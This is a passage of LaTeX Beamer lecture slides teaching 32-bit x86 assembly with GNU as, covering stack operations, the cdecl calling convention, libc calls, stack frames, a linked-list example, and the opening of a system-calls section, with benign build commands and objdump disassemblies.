1432 | \end{frame}
1433 | 
1434 | \begin{frame}[fragile]
1435 | \frametitle{Stack Batch Allocation / Deallocation}
1436 | \mvs
1437 | \begin{figure}
1438 | \centering
1439 | \includegraphics[width=0.90\textwidth]{figures/x86stackalloc.png}
1440 | \end{figure}
1441 | \begin{itemize}
1442 | \item We can batch allocate/deallocate space by simply adjusting {\ttfamily \%esp}
1443 | \end{itemize}
1444 | \end{frame}
1445 | 
1446 | \begin{frame}[fragile,t]
1447 | \frametitle{Example Stack Usage (example-stack.S)}
1448 | \mvs
1449 | \begin{gascode}
1450 | # Stack is now
1451 | # |    ...     |   <-- %esp = 0x8xxxxxxx
1452 | 
1453 | movl $0x05, %eax    # Load 0x00000005 into %eax
1454 | 
1455 | pushl %eax          # Push dword 0x00000005 onto the stack
1456 | incl %eax           # %eax += 1
1457 | pushl %eax          # Push dword 0x00000006 onto the stack
1458 | 
1459 | pushl $0xdeadbeef   # Push dword 0xdeadbeef onto the stack
1460 | 
1461 | # Stack is now
1462 | # |    ...     |
1463 | # | 0x00000005 |
1464 | # | 0x00000006 |
1465 | # | 0xdeadbeef |   <-- %esp = 0x8xxxxxxx
1466 | 
1467 | popl %ebx           # Pop dword off of the stack,
1468 |                     # %ebx = 0xdeadbeef now
1469 | 
1470 | # Stack is now
1471 | # |    ...     |
1472 | # | 0x00000005 |
1473 | # | 0x00000006 |  <-- %esp = 0x8xxxxxxx
1474 | # | 0xdeadbeef |
1475 | \end{gascode}
1476 | \end{frame}
1477 | 
1478 | \begin{frame}[fragile,t]
1479 | \frametitle{Example Stack Usage (example-stack.S)}
1480 | \mvs
1481 | \begin{gascode}
1482 | # Stack is now
1483 | # |    ...     |
1484 | # | 0x00000005 |
1485 | # | 0x00000006 |  <-- %esp = 0x8xxxxxxx
1486 | # | 0xdeadbeef |
1487 | 
1488 | addl $4, %esp       # Deallocate 4 bytes off of the stack
1489 | 
1490 | # Stack is now
1491 | # |    ...     |
1492 | # | 0x00000005 |  <-- %esp = 0x8xxxxxxx
1493 | # | 0x00000006 |
1494 | # | 0xdeadbeef |
1495 | 
1496 | movl $0xaaaaaaaa, (%esp)  # Write 0xaaaaaaaa to the stack
1497 | 
1498 | # Stack is now
1499 | # |    ...     |
1500 | # | 0xaaaaaaaa |  <-- %esp = 0x8xxxxxxx
1501 | # | 0x00000006 |
1502 | # | 0xdeadbeef |
1503 | 
1504 | \end{gascode}
1505 | \end{frame}
1506 | 
1507 | \begin{frame}[fragile,t]
1508 | \frametitle{Example Stack Usage (example-stack.S) Disassembly}
1509 | \mvs
1510 | \begin{customobjdumpcode}
1511 | $ as example-stack.S -o example-stack.o
1512 | $ ld example-stack.o -o example-stack
1513 | $ objdump -D example-stack
1514 | 
1515 | Disassembly of section .text:
1516 | 
1517 | 08048054 <_start>:
1518 |  8048054:	b8 05 00 00 00       	mov    $0x5,%eax
1519 |  8048059:	50                   	push   %eax
1520 |  804805a:	40                   	inc    %eax
1521 |  804805b:	50                   	push   %eax
1522 |  804805c:	68 ef be ad de       	push   $0xdeadbeef
1523 |  8048061:	5b                   	pop    %ebx
1524 |  8048062:	83 c4 04             	add    $0x4,%esp
1525 |  8048065:	c7 04 24 aa aa aa aa 	movl   $0xaaaaaaaa,(%esp)
1526 | 
1527 | ...
1528 | \end{customobjdumpcode}
1529 | \end{frame}
1530 | 
1531 | \section{Topic 7: Functions and cdecl Convention}
1532 | 
1533 | \begin{frame}[fragile,t]
1534 | \frametitle{{\ttfamily call} and {\ttfamily ret}}
1535 | \mvs
1536 | \begin{itemize}
1537 |   \item {\ttfamily jmp <label>} merely updates {\ttfamily \%eip} to address of {\ttfamily <label>}
1538 |   \item {\ttfamily call <label>} pushes a return address onto the stack, then jumps to {\ttfamily <label>}
1539 |   \item {\ttfamily ret} pops the return address off the stack, and jumps to it
1540 | \end{itemize}
1541 |   \begin{gascode}
1542 |       # Stack is now
1543 |       # |    ...     |
1544 | 
1545 |       movl $0, %eax
1546 |       call addOneToEax
1547 |       # Stack is once again
1548 |       # |    ...     |
1549 | 
1550 |       call addOneToEax
1551 |       call addOneToEax
1552 |       # %eax is now 3
1553 | 
1554 |       ...
1555 |       addOneToEax:
1556 |         # Stack is now
1557 |         # |    ...     |
1558 |         # |  retaddr   | <- %esp
1559 |         incl %eax
1560 |         ret
1561 |   \end{gascode}
1562 | \end{frame}
1563 | 
1564 | \begin{frame}[fragile,t]
1565 | \frametitle{Function Arguments on the Stack}
1566 | \mvs
1567 | \begin{itemize}
1568 |   \item Arguments can be passed on the stack to functions
1569 | \end{itemize}
1570 | \begin{gascode}
1571 |   pushl $5
1572 |   call doubleArg
1573 |   # %eax is now 10
1574 | 
1575 |   ...
1576 |   doubleArg:
1577 |     # Stack is now
1578 |     # |    ...     |
1579 |     # | 0x00000005 | <- %esp+4
1580 |     # | retaddr    | <- %esp
1581 |     movl 4(%esp), %eax    # %eax = *(%esp+4)
1582 |     addl %eax, %eax       # %eax += %eax
1583 |     ret
1584 | \end{gascode}
1585 | \begin{itemize}
1586 |   \item or via registers?
1587 | \end{itemize}
1588 | \begin{gascode}
1589 |   movl $5, %eax
1590 |   # %eax is 5
1591 |   call doubleArg
1592 |   # %eax is now 10
1593 | 
1594 |   doubleArg:
1595 |     addl %eax, %eax       # %eax += %eax
1596 |     ret
1597 | \end{gascode}
1598 | \end{frame}
1599 | 
1600 | \begin{frame}[fragile,t]
1601 | \frametitle{{\ttfamily cdecl} Calling Convention}
1602 | \begin{itemize}
1603 |   \item How can we ensure that our CPU state \\ ({\ttfamily \%eax, \%ebx, \%ecx, \%edx, \%edi, ...}) \\ doesn't get corrupted when a function needs to use those registers to do useful work?
1604 |   \pause
1605 |   \item How should we pass arguments to functions?
1606 |   \begin{itemize}
1607 |     \item Fixed memory addresses? Stack? Registers?
1608 |   \end{itemize}
1609 |   \pause
1610 |   \item GCC on Linux uses the {\ttfamily cdecl} calling convention
1611 |   \begin{itemize}
1612 |      \item function arguments pushed onto the stack from right to left
1613 |      \item {\ttfamily \%eax, \%ecx, \%edx} can be used by the function \\ (must be preserved by caller if necessary)
1614 |      \item other registers are preserved by function
1615 |      \item return value in {\ttfamily \%eax}
1616 |      \item function arguments pushed onto the stack must be cleaned up by caller
1617 |   \end{itemize}
1618 | \end{itemize}
1619 | \end{frame}
1620 | 
1621 | \begin{frame}[fragile,t]
1622 | \mvs
1623 | \frametitle{Example {\ttfamily cdecl} Calling Convention (example-cdecl.S)}
1624 | \begin{gascode}
1625 | .section .text
1626 |   # sumThreeNumbers(*magicNumber, 5, 12);
1627 |   pushl $12             # Push 0x000000C
1628 |   pushl $5              # Push 0x0000005
1629 |   pushl magicNumber     # Push *magicNumber
1630 |   call sumThreeNumbers
1631 |   addl $12, %esp        # Clean up arguments off of the stack
1632 |   # %eax is 59
1633 | 
1634 | sumThreeNumbers:
1635 |   # Stack is now
1636 |   # |    ...     |
1637 |   # |     12     | <- %esp+12
1638 |   # |      5     | <- %esp+8
1639 |   # |     42     | <- %esp+4
1640 |   # | retaddr    | <- %esp
1641 | 
1642 |   movl $0, %eax        # Clear %eax
1643 |   addl 4(%esp), %eax   # %eax += *(%esp+4)
1644 |   addl 8(%esp), %eax   # %eax += *(%esp+8)
1645 |   addl 12(%esp), %eax  # %eax += *(%esp+12)
1646 |   ret
1647 | 
1648 | .section .data
1649 |   magicNumber: .long 42
1650 | \end{gascode}
1651 | \end{frame}
1652 | 
1653 | \begin{frame}[fragile,t]
1654 | \frametitle{Example {\ttfamily cdecl} Calling Convention (example-cdecl.S) Disassembly}
1655 | \mvs
1656 | \begin{customobjdumpcode}
1657 | $ as example-cdecl.S -o example-cdecl.o
1658 | $ ld example-cdecl.o -o example-cdecl
1659 | $ objdump -D example-cdecl
1660 | 
1661 | Disassembly of section .text:
1662 | 
1663 | 08048074 <_start>:
1664 |  8048074:   6a 0c                   push   $0xc
1665 |  8048076:   6a 05                   push   $0x5
1666 |  8048078:   ff 35 98 90 04 08       pushl  0x8049098
1667 |  804807e:   e8 03 00 00 00          call   8048086 <sumThreeNumbers>
1668 |  8048083:   83 c4 0c                add    $0xc,%esp
1669 | 
1670 | 08048086 <sumThreeNumbers>:
1671 |  8048086:   b8 00 00 00 00          mov    $0x0,%eax
1672 |  804808b:   03 44 24 04             add    0x4(%esp),%eax
1673 |  804808f:   03 44 24 08             add    0x8(%esp),%eax
1674 |  8048093:   03 44 24 0c             add    0xc(%esp),%eax
1675 |  8048097:   c3                      ret    
1676 | 
1677 | Disassembly of section .data:
1678 | 08049098 <magicNumber>:
1679 |  8049098:   2a 00                   sub    (%eax),%al
1680 |     ...
1681 | 
1682 | \end{customobjdumpcode}
1683 | \end{frame}
1684 | 
1685 | \begin{frame}[fragile,t]
1686 | \frametitle{Example {\ttfamily cdecl} with libc (example-libc.S)}
1687 | \vspace{-0.5em}
1688 | \begin{itemize}
1689 |     \item {\ttfamily libc} library functions you use in C (strings, math, time, files, sockets, etc.) are all accessible in assembly when linking with libc
1690 |     \item Follow the {\ttfamily cdecl} calling convention
1691 | \end{itemize}
1692 | \vspace{0.25em}
1693 | \begin{gascode}
1694 | .section .text
1695 | .global main
1696 | main:
1697 |   # %eax = time(NULL);
1698 |   pushl $0
1699 |   call time
1700 |   add $4, %esp
1701 | 
1702 |   # *curtime = %eax
1703 |   movl %eax, curtime
1704 | 
1705 |   # %eax = localtime(&curtime);
1706 |   pushl $curtime
1707 |   call localtime
1708 |   add $4, %esp
1709 | 
1710 |   # %eax = asctime(%eax);
1711 |   pushl %eax
1712 |   call asctime
1713 |   add $4, %esp
1714 | \end{gascode}
1715 | \end{frame}
1716 | 
1717 | \begin{frame}[fragile,t]
1718 | \mvs
1719 | \frametitle{Example {\ttfamily cdecl} with libc (example-libc.S) Continued}
1720 | \begin{gascode}
1721 |   # printf("%s\n", %eax);
1722 |   pushl %eax
1723 |   pushl $formatStr
1724 |   call printf
1725 |   add $8, %esp
1726 | 
1727 |   ret
1728 | 
1729 | .section .data
1730 |   .comm curtime, 4
1731 |   formatStr:  .ascii "%s\0"
1732 | \end{gascode}
1733 | {\small Runtime:}
1734 | \begin{textcode}
1735 | $ as example-libc.S -o example-libc.o
1736 | $ gcc example-libc.o -o example-libc
1737 | $ ./example-libc
1738 | Wed Jan 25 16:13:27 2012
1739 | $
1740 | \end{textcode}
1741 | \end{frame}
1742 | 
1743 | \begin{frame}[fragile,t]
1744 | \frametitle{Example {\ttfamily cdecl} with libc (example-libc.S) Disassembly}
1745 | \mvs
1746 | \begin{customobjdumpcode}
1747 | $ as example-libc.S -o example-libc.o
1748 | $ ld example-libc.o -o example-libc
1749 | $ objdump -D example-libc
1750 | 
1751 | Disassembly of section .text:
1752 | ...
1753 | 0804848c <main>:
1754 |  804848c:   6a 00                   push   $0x0
1755 |  804848e:   e8 ad fe ff ff          call   8048340 <time@plt>
1756 |  8048493:   83 c4 04                add    $0x4,%esp
1757 |  8048496:   a3 30 97 04 08          mov    %eax,0x8049730
1758 |  804849b:   68 30 97 04 08          push   $0x8049730
1759 |  80484a0:   e8 cb fe ff ff          call   8048370 <localtime@plt>
1760 |  80484a5:   83 c4 04                add    $0x4,%esp
1761 |  80484a8:   50                      push   %eax
1762 |  80484a9:   e8 a2 fe ff ff          call   8048350 <asctime@plt>
1763 |  80484ae:   83 c4 04                add    $0x4,%esp
1764 |  80484b1:   50                      push   %eax
1765 |  80484b2:   68 28 97 04 08          push   $0x8049728
1766 |  80484b7:   e8 74 fe ff ff          call   8048330 <printf@plt>
1767 |  80484bc:   83 c4 08                add    $0x8,%esp
1768 |  80484bf:   c3                      ret    
1769 | 
1770 | ...
1771 | \end{customobjdumpcode}
1772 | \end{frame}
1773 | 
1774 | \section{Entry Points}
1775 | 
1776 | \begin{frame}[fragile,t]
1777 | \frametitle{Plain Entry Point}
1778 | \begin{itemize}
1779 |   \item ELF binary specifies an entry point address for the OS to set initial {\ttfamily \%eip} to
1780 |   \item {\ttfamily ld} expects this to be specified by the symbol {\ttfamily \_start}
1781 | \end{itemize}
1782 | \pause
1783 | \begin{gascode}
1784 | .section .text
1785 | .global _start    # Export the symbol
1786 | _start:
1787 |   nop             # Off to a good start...
1788 |   nop
1789 |   nop
1790 |   loop: jmp loop  # Loop forever
1791 | \end{gascode}
1792 | \begin{textcode}
1793 | $ as test.S -o test.o
1794 | $ ld test.o -o test
1795 | $ ./test
1796 | \end{textcode}
1797 | \end{frame}
1798 | 
1799 | \begin{frame}[fragile,t]
1800 | \frametitle{{\ttfamily libc} Entry Point}
1801 | \begin{itemize}
1802 |   \item When we link with {\ttfamily libc}, it provides its own {\ttfamily \_start} to do some initialization, which eventually will call {\ttfamily main}
1803 |   \item We provide a {\ttfamily main} and also a return back to libc with {\ttfamily ret} and a return value in {\ttfamily \%eax}
1804 |   \item libc {\ttfamily exit()'s} with this value
1805 | \end{itemize}
1806 | \pause
1807 | \begin{gascode}
1808 | .section .text
1809 | .global main
1810 | main:
1811 |   nop
1812 |   nop
1813 |   nop
1814 |   movl $3, %eax   # Return 3!
1815 |   ret
1816 | \end{gascode}
1817 | \begin{textcode}
1818 | $ as test.S -o test.o
1819 | $ gcc test.o -o test    # Use gcc to invoke ld to link with libc
1820 | $ ./test
1821 | $ echo $?
1822 | 3
1823 | $
1824 | \end{textcode}
1825 | \end{frame}
1826 | 
1827 | \section{Program Example: 99 Bottles of Beer on the Wall}
1828 | \begin{frame}[fragile,t]
1829 | \mvs
1830 | \frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
1831 | \begin{gascode}
1832 | .section .text
1833 | .global main
1834 | main:
1835 |   movl $99, %eax    # Start with 99 bottles!
1836 |   # We could use a cdecl callee preserved register,
1837 |   # but we'll make it hard on ourselves to practice
1838 |   # caller saving/restoring
1839 | 
1840 |   # printf(char *format, ...);
1841 | 
1842 |   more_beer:
1843 |     # Save %eax since it will get used by printf()
1844 |     pushl %eax
1845 | 
1846 |     # printf(formatStr1, %eax, %eax);
1847 |     pushl %eax
1848 |     pushl %eax
1849 |     pushl $formatStr1   # *Address* of formatStr1
1850 |     call printf
1851 |     addl $12, %esp      # Clean up the stack
1852 | 
1853 |     # Restore %eax
1854 |     popl %eax
1855 |     # Drink a beer
1856 |     decl %eax
1857 | \end{gascode}
1858 | \end{frame}
1859 | 
1860 | \begin{frame}[fragile,t]
1861 | \mvs
1862 | \frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
1863 | \begin{gascode}
1864 |     # Save %eax
1865 |     pushl %eax
1866 | 
1867 |     # printf(formatStr2, %eax);
1868 |     pushl %eax
1869 |     pushl $formatStr2   # *Address* of formatStr2
1870 |     call printf
1871 |     addl $8, %esp       # Clean up the stack
1872 | 
1873 |     # Restore %eax
1874 |     popl %eax
1875 | 
1876 |     # Loop
1877 |     test %eax, %eax
1878 |     jnz more_beer
1879 | 
1880 |   # printf(formatStr3);
1881 |   pushl $formatStr3
1882 |   call printf
1883 |   addl $4, %esp
1884 | 
1885 |   movl $0, %eax
1886 |   ret
1887 | 
1888 | \end{gascode}
1889 | \end{frame}
1890 | 
1891 | \begin{frame}[fragile,t]
1892 | \mvs
1893 | \frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S)}
1894 | \begin{gascode}
1895 | .section .data
1896 |   formatStr1:
1897 | .ascii "%d bottles of beer on the wall! %d bottles of beer!\n\0"
1898 |   formatStr2:
1899 | .ascii "Take one down, pass it around, %d bottles of beer on the wall!\n\0"
1900 |   formatStr3:
1901 | .ascii "No more bottles of beer on the wall!\n\0"
1902 | \end{gascode}
1903 | \end{frame}
1904 | 
1905 | \begin{frame}[fragile,t]
1906 | \mvs
1907 | \frametitle{99 Bottles of Beer on the Wall (99\_bottles\_of\_beer.S) Runtime}
1908 | \begin{textcode}
1909 | $ as 99_bottles_of_beer.S -o 99_bottles_of_beer.o
1910 | $ gcc 99_bottles_of_beer.o -o 99_bottles_of_beer
1911 | $ ./99_bottles_of_beer
1912 | 99 bottles of beer on the wall! 99 bottles of beer!
1913 | Take one down, pass it around, 98 bottles of beer on the wall!
1914 | 98 bottles of beer on the wall! 98 bottles of beer!
1915 | Take one down, pass it around, 97 bottles of beer on the wall!
1916 | 97 bottles of beer on the wall! 97 bottles of beer!
1917 | ...
1918 | 3 bottles of beer on the wall! 3 bottles of beer!
1919 | Take one down, pass it around, 2 bottles of beer on the wall!
1920 | 2 bottles of beer on the wall! 2 bottles of beer!
1921 | Take one down, pass it around, 1 bottles of beer on the wall!
1922 | 1 bottles of beer on the wall! 1 bottles of beer!
1923 | Take one down, pass it around, 0 bottles of beer on the wall!
1924 | No more bottles of beer on the wall!
1925 | $
1926 | \end{textcode}
1927 | \end{frame}
1928 | 
1929 | \section{Topic 8: Stack Frames}
1930 | 
1931 | \begin{frame}[fragile,t]
1932 | \frametitle{Where did that argument go?}
1933 | \mvs
1934 | \begin{itemize}
1935 |   \item Referring to arguments with {\ttfamily \%esp} in a function is easy, until you start moving around {\ttfamily \%esp} itself.
1936 | \end{itemize}
1937 | \begin{gascode}
1938 |   pushl $5
1939 |   call doSomething
1940 |   addl $4, %esp
1941 | 
1942 |   ...
1943 |   doSomething:
1944 |     # Stack is now
1945 |     # |    ...     |
1946 |     # |      5     | <- %esp+4
1947 |     # | retaddr    | <- %esp
1948 |     # Argument is at %esp+4
1949 | 
1950 |     subl $12, %esp   # Allocate 12 bytes on the stack
1951 | 
1952 |     # Stack is now
1953 |     # |    ...     |
1954 |     # |      5     | <- %esp+16
1955 |     # | retaddr    | <- %esp+12
1956 |     # | local var  | <- %esp+8
1957 |     # | local var  | <- %esp+4
1958 |     # | local var  | <- %esp
1959 |     # Argument is now at %esp+16 !
1960 | \end{gascode}
1961 | \end{frame}
1962 | 
1963 | \begin{frame}[fragile,t]
1964 | \frametitle{Frame Pointer}
1965 | \begin{itemize}
1966 |   \item What if we had an anchor point in our stack at the start of our function?
1967 |   \item We could have constant offsets above to arguments and below to allocated variables from the anchor point
1968 |   \pause
1969 |   \item This is the conventional role of register {\ttfamily \%ebp}, the frame pointer \\ (also called base pointer)
1970 | \end{itemize}
1971 | \end{frame}
1972 | 
1973 | \begin{frame}[fragile,t]
1974 | \frametitle{Frame Pointer Prologue}
1975 | \mvs
1976 | \begin{gascode}
1977 |   pushl $5
1978 |   call doSomething
1979 |   addl $4, %esp
1980 |   ...
1981 |   doSomething:
1982 |     pushl %ebp        # Function is responsible for saving this in cdecl!
1983 |     movl %esp, %ebp   # Anchor %ebp at the current %esp
1984 |     # Stack is now
1985 |     # |    ...     |
1986 |     # |      5     | <- %esp+8  %ebp+8
1987 |     # | retaddr    | <- %esp+4  %ebp+4
1988 |     # |  old %ebp  | <- %esp    %ebp
1989 |     # Argument is at %ebp+8
1990 | 
1991 |     subl $12, %esp   # Allocate 12 bytes on the stack
1992 |     # Stack is now
1993 |     # |    ...     |
1994 |     # |      5     | <- %esp+20  %ebp+8
1995 |     # | retaddr    | <- %esp+16  %ebp+4
1996 |     # |  old %ebp  | <- %esp+12  %ebp
1997 |     # | local var  | <- %esp+8   %ebp-4
1998 |     # | local var  | <- %esp+4   %ebp-8
1999 |     # | local var  | <- %esp     %ebp-12
2000 |     # Argument is still always at %ebp+8
2001 |     # Allocated memory always at %ebp-4, %ebp-8, %ebp-12
2002 | \end{gascode}
2003 | \end{frame}
2004 | 
2005 | \begin{frame}[fragile,t]
2006 | \frametitle{Frame Pointer Epilogue}
2007 | \begin{itemize}
2008 |   \item To have a valid return address on the stack, we must reset {\ttfamily \%esp} to its previous value and pop the saved frame pointer
2009 |   \item This conveniently also deallocates any space we allocated on the stack
2010 | \end{itemize}
2011 | \begin{gascode}
2012 |     movl %ebp, %esp   # Restore %esp, deallocating space on the stack
2013 |     popl %ebp         # Restore the frame pointer
2014 |     ret               # Return
2015 | \end{gascode}
2016 | \end{frame}
2017 | 
2018 | \begin{frame}[fragile]
2019 | \frametitle{Stack Frame in a Nutshell}
2020 | \mvs
2021 | \begin{figure}
2022 | \centering
2023 | \includegraphics[width=0.68\textwidth]{figures/stackframe.png}
2024 | \end{figure}
2025 | \end{frame}
2026 | 
2027 | \begin{frame}[fragile,t]
2028 | \frametitle{Example using the Frame Pointer (example-ebp.S)}
2029 | \mvs
2030 | \begin{gascode}
2031 | .section .text
2032 | _start:
2033 |   pushl $22
2034 |   pushl $20
2035 |   pushl $42
2036 |   pushl $3
2037 |   call sumNumbers
2038 |   addl $16, %esp
2039 |   # %eax is now 84
2040 | 
2041 |   # sumNumbers(int n, ...)
2042 |   sumNumbers:
2043 |     # Function prologue, save old frame pointer and setup new one
2044 |     pushl %ebp
2045 |     movl %esp, %ebp
2046 | 
2047 |     movl $0, %eax       # Clear %eax
2048 |     movl $0, %ecx       # Clear %ecx
2049 |     movl 8(%ebp), %edx  # Copy argument 1, n, into %edx
2050 | 
2051 | \end{gascode}
2052 | \end{frame}
2053 | 
2054 | \begin{frame}[fragile,t]
2055 | \frametitle{Example using the Frame Pointer (example-ebp.S)}
2056 | \mvs
2057 | \begin{gascode}
2058 |     sumLoop:
2059 |       # Add argument 2, 3, 4, ... n+1 in %eax
2060 |       # Argument 2 starts at %ebp+12
2061 |       addl 12(%ebp, %ecx, 4), %eax
2062 |       incl %ecx
2063 | 
2064 |       # Loop
2065 |       decl %edx
2066 |       jnz sumLoop
2067 | 
2068 |     # Function epilogue, deallocate and restore old frame pointer
2069 |     movl %ebp, %esp
2070 |     popl %ebp
2071 |     ret
2072 | \end{gascode}
2073 | \end{frame}
2074 | 
2075 | \begin{frame}[fragile,t]
2076 | \frametitle{Example using the Frame Pointer (example-ebp.S) Disassembly}
2077 | \mvs
2078 | \begin{customobjdumpcode*}{fontsize=\fontsize{8}{8}}
2079 | $ as example-ebp.S -o example-ebp.o
2080 | $ ld example-ebp.o -o example-ebp
2081 | $ objdump -D example-ebp
2082 | 
2083 | Disassembly of section .text:
2084 | 
2085 | 08048054 <_start>:
2086 |  8048054:   6a 16                   push   $0x16
2087 |  8048056:   6a 14                   push   $0x14
2088 |  8048058:   6a 2a                   push   $0x2a
2089 |  804805a:   6a 03                   push   $0x3
2090 |  804805c:   e8 03 00 00 00          call   8048064 <sumNumbers>
2091 |  8048061:   83 c4 10                add    $0x10,%esp
2092 | 08048064 <sumNumbers>:
2093 |  8048064:   55                      push   %ebp
2094 |  8048065:   89 e5                   mov    %esp,%ebp
2095 |  8048067:   b8 00 00 00 00          mov    $0x0,%eax
2096 |  804806c:   b9 00 00 00 00          mov    $0x0,%ecx
2097 |  8048071:   8b 55 08                mov    0x8(%ebp),%edx
2098 | 08048074 <sumLoop>:
2099 |  8048074:   03 44 8d 0c             add    0xc(%ebp,%ecx,4),%eax
2100 |  8048078:   41                      inc    %ecx
2101 |  8048079:   4a                      dec    %edx
2102 |  804807a:   75 f8                   jne    8048074 <sumLoop>
2103 |  804807c:   89 ec                   mov    %ebp,%esp
2104 |  804807e:   5d                      pop    %ebp
2105 |  804807f:   c3                      ret    
2106 | 
2107 | ...
2108 | \end{customobjdumpcode*}
2109 | \end{frame}
2110 | 
2111 | 
2112 | \part{2}
2113 | 
2114 | \section{Topic 9: Command-line Arguments}
2115 | 
2116 | \begin{frame}[fragile,t]
2117 | \frametitle{{\ttfamily argc} and {\ttfamily **argv} on the stack}
2118 | \mvs
2119 | \begin{itemize}
2120 |   \item In the {\ttfamily \_start} entry point, first argument on the stack is {\ttfamily argc}, followed by {\ttfamily argv[0], argv[1], ...}
2121 | \end{itemize}
2122 | \begin{gascode}
2123 | .section .text
2124 | .global _start
2125 | _start:
2126 |   pushl %ebp
2127 |   movl %esp, %ebp
2128 |   # argc is at %ebp+4, argv[0] is at %ebp+8, argv[1] is at %ebp+12
2129 | \end{gascode}
2130 | \begin{itemize}
2131 |   \item In the {\ttfamily main} entry point with libc, {\ttfamily argc, **argv} will be on the stack after the return address to libc, we have to dereference to get to the args!
2132 | \end{itemize}
2133 | \begin{gascode}
2134 | .section .text
2135 | .global main
2136 | main:
2137 |   pushl %ebp
2138 |   movl %esp, %ebp
2139 |   # return address to libc is at %ebp+4
2140 |   # argc is at %ebp+8, **argv is at %ebp+12
2141 |   # *argv[0] = *(%ebp+12), *argv[1] = *(%ebp+12)+4
2142 | \end{gascode}
2143 | \end{frame}
2144 | 
2145 | \section{Program Example: Linked List}
2146 | 
2147 | \begin{frame}[fragile,t]
2148 | \frametitle{Linked List (linked\_list.S)}
2149 | \mvs
2150 | \begin{gascode}
2151 | .section .text
2152 | .global main
2153 | 
2154 | # struct list { int data; struct list *next; };
2155 | #
2156 | #  [ int data; ][ list *next; ]   8 bytes total
2157 | #   \ 4 bytes /  \  4 bytes  /
2158 | 
2159 | # list *list_alloc(int data);
2160 | list_alloc:
2161 |   pushl $8            # %eax = malloc(8);
2162 |   call malloc
2163 |   addl $4, %esp
2164 | 
2165 |   testl %eax, %eax    # if (%eax == NULL)
2166 |   jz fatal            #   goto fatal;
2167 | 
2168 |   movl 4(%esp), %ecx
2169 |   movl %ecx, (%eax)   # %eax->data = data
2170 |   movl $0, 4(%eax)    # %eax->next = 0
2171 |   ret
2172 | 
2173 |   # Dirty error handling
2174 |   fatal:
2175 |     jmp fatal
2176 | \end{gascode}
2177 | \end{frame}
2178 | 
2179 | \begin{frame}[fragile,t]
2180 | \frametitle{Linked List (linked\_list.S) Continued}
2181 | \mvs
2182 | \begin{gascode}
2183 | # void list_add(list *head, int data);
2184 | list_add:
2185 |   push %ebp
2186 |   mov %esp, %ebp
2187 |   subl $4, %esp           # list *n;
2188 | 
2189 |   pushl 12(%ebp)          # %eax = list_alloc(data);
2190 |   call list_alloc
2191 |   addl $4, %esp
2192 |   mov %eax, -4(%ebp)      # n = %eax;
2193 | 
2194 |   mov 8(%ebp), %eax       # %eax = head
2195 |   traverse_add:
2196 |     cmpl $0, 4(%eax)      # if (%eax->next == NULL)
2197 |     jz at_end_add         #  goto at_end_add;
2198 |     movl 4(%eax), %eax    # %eax = %eax->next
2199 |     jmp traverse_add      # Loop
2200 | 
2201 |   at_end_add:
2202 |   movl -4(%ebp), %ecx     # %ecx = n
2203 |   movl %ecx, 4(%eax)      # %eax->next = %ecx
2204 | 
2205 |   mov %ebp, %esp
2206 |   pop %ebp
2207 |   ret
2208 | \end{gascode}
2209 | \end{frame}
2210 | 
2211 | \begin{frame}[fragile,t]
2212 | \frametitle{Linked List (linked\_list.S) Continued}
2213 | \mvs
2214 | \begin{gascode}
2215 | # void list_dump(list *head);
2216 | list_dump:
2217 |   push %ebp
2218 |   mov %esp, %ebp
2219 | 
2220 |   pushl %ebx              # Save %ebx
2221 |   movl 8(%ebp), %ebx      # %ebx = head
2222 | 
2223 |   traverse_dump:
2224 |     testl %ebx, %ebx    # if (%ebx == NULL)
2225 |     jz at_end_dump      #  goto at_end_dump;
2226 | 
2227 |     movl (%ebx), %ecx   # %ecx = %ebx->data
2228 |     pushl %ecx          # printf("%d\n", %ecx)
2229 |     pushl $fmtStr
2230 |     call printf
2231 |     addl $8, %esp
2232 | 
2233 |     movl 4(%ebx), %ebx  # %ebx = %ebx->next
2234 |     jmp traverse_dump   # Loop
2235 | 
2236 |   at_end_dump:
2237 |   pop %ebx                # Restore %ebx
2238 |   mov %ebp, %esp
2239 |   pop %ebp
2240 |   ret
2241 | \end{gascode}
2242 | \end{frame}
2243 | 
2244 | \begin{frame}[fragile,t]
2245 | \frametitle{Linked List (linked\_list.S) Continued}
2246 | \mvs
2247 | \begin{gascode}
2248 | main:
2249 |   pushl $86           # %eax = list_alloc(86);
2250 |   call list_alloc
2251 |   addl $4, %esp
2252 |   movl %eax, head     # head = %eax
2253 | 
2254 |   pushl $75           # list_add(head, 75);
2255 |   pushl head
2256 |   call list_add
2257 |   addl $8, %esp
2258 | 
2259 |   pushl $309          # list_add(head, 309);
2260 |   pushl head
2261 |   call list_add
2262 |   addl $8, %esp
2263 | 
2264 |   pushl head          # list_dump(head);
2265 |   call list_dump
2266 |   addl $4, %esp
2267 | 
2268 |   movl $0, %eax       # Return 0
2269 |   ret
2270 | 
2271 | .section .data
2272 |   head:     .long 0
2273 |   fmtStr:   .ascii "%d\n\0"
2274 | \end{gascode}
2275 | \end{frame}
2276 | 
2277 | \begin{frame}[fragile,t]
2278 | \frametitle{Linked List (linked\_list.S) Runtime}
2279 | \mvs
2280 | \begin{textcode}
2281 | $ as linked_list.S -o linked_list.o
2282 | $ gcc linked_list.o -o linked_list
2283 | $ ./linked_list
2284 | 86
2285 | 75
2286 | 309
2287 | $
2288 | \end{textcode}
2289 | \end{frame}
2290 | 
2291 | \section*{Lingering Questions?}
2292 | 
2293 | \section{Topic 10: System Calls}
2294 | 
2295 | \begin{frame}[fragile,t]
2296 | \frametitle{The User Program Condition}
2297 | \begin{itemize}
2298 |   \item Monolithic kernel like Linux completely sandboxes a user program
2299 |   \begin{itemize}
2300 |   \item User program executes at a lower CPU privilege
2301 |   \item Virtual memory hides other programs, restricts access to kernel memory and memory-mapped I/O
2302 |   \end{itemize}
2303 |   \vs \vs
2304 |   \pause
2305 |   \item User program can effectively only do pure computation and manipulate user memory mapped by the OS
2306 | \end{itemize}
2307 | \pause
2308 | \begin{figure}
2309 | \centering
2310 | \includegraphics[height=0.40\paperheight]{figures/hamster.jpg}
2311 | \end{figure}
2312 | \end{frame}
2313 | 
2314 | \begin{frame}[fragile,t]
2315 | \frametitle{Interrupts and System Calls}
2316 | \begin{itemize}
2317 |   \item CPU is capable of servicing hardware and software interrupts
2318 |   \begin{itemize}
2319 |     \item timer tick, DMA exchange complete, divide-by-zero
2320 |   \end{itemize}
2321 |   \pause
2322 |   \item External interrupts can happen asynchronously --- are not polled --- and \textbf{interrupt} current program
2323 |   \pause
